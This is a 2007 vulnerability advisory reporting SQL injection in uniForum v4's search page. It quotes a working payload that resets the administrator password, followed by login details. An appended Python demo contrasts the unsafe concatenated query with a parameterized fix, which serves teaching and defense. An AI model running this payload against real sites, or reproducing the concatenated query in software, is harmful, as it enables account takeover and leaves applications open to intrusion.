securityvulns SECURITYVULNS:DOC:15677
History: Jan 11, 2007 - 12:00 a.m.

uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability


Title : uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

Author : ajann

Contact : :(

S.Page : …

Vendor : http://uniforum.biz/

$$ : $99


[[SQL]]---------------------------------------------------------

http://[target]/[path]//wbsearch.aspx (POST Method) [SQL]

Example:

// First find wbsearch.aspx; in the "by User" field, enter: ';update admin set Password='000245'--

Login Admin: http://www.xxx.com/[path]/wbadmlog.aspx
Username: Administrator
Password: 000245

[[/SQL]]

"""""""""""""""""""""

ajann,Turkey

I'm not a hacker!

milw0rm.com [2007-01-09]
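
The flaw class the advisory describes, as an added example (not uniForum code and not from the advisory's author): a constructed SQLite stand-in shows the advisory's "by User" value rewriting the admin row when the search query is built by string concatenation, and being treated as plain data when bound as a parameter. The schema and function names are hypothetical, and `executescript` stands in for SQL Server's execution of stacked statements.

```python
import sqlite3

# Field value quoted in the advisory, with the SQL comment marker written as "--".
FIELD = "';update admin set Password='000245'--"

def make_db():
    """Constructed in-memory stand-in for the forum database (schema is assumed)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE admin (Username TEXT, Password TEXT);
        CREATE TABLE posts (author TEXT, body TEXT);
        INSERT INTO admin VALUES ('Administrator', 'original-secret');
        INSERT INTO posts VALUES ('alice', 'hello');
    """)
    return db

def admin_password(db):
    return db.execute("SELECT Password FROM admin").fetchone()[0]

def search_concat(db, user):
    # Weak pattern: the field value is pasted into the SQL text, so a quote
    # closes the string literal and the rest runs as a second statement.
    db.executescript("SELECT body FROM posts WHERE author = '" + user + "';")

def search_param(db, user):
    # Hardened pattern: the value is bound as data and never parsed as SQL.
    return db.execute(
        "SELECT body FROM posts WHERE author = ?", (user,)
    ).fetchall()

def demo():
    weak, safe = make_db(), make_db()
    search_concat(weak, FIELD)        # admin row is overwritten
    rows = search_param(safe, FIELD)  # no author has that name; nothing changes
    return admin_password(weak), admin_password(safe), rows

if __name__ == "__main__":
    print(demo())
```

In ASP.NET the equivalent fix is a `SqlCommand` with `SqlParameter` values instead of concatenated text, ideally with a database account for the search page that has no UPDATE right on the admin table.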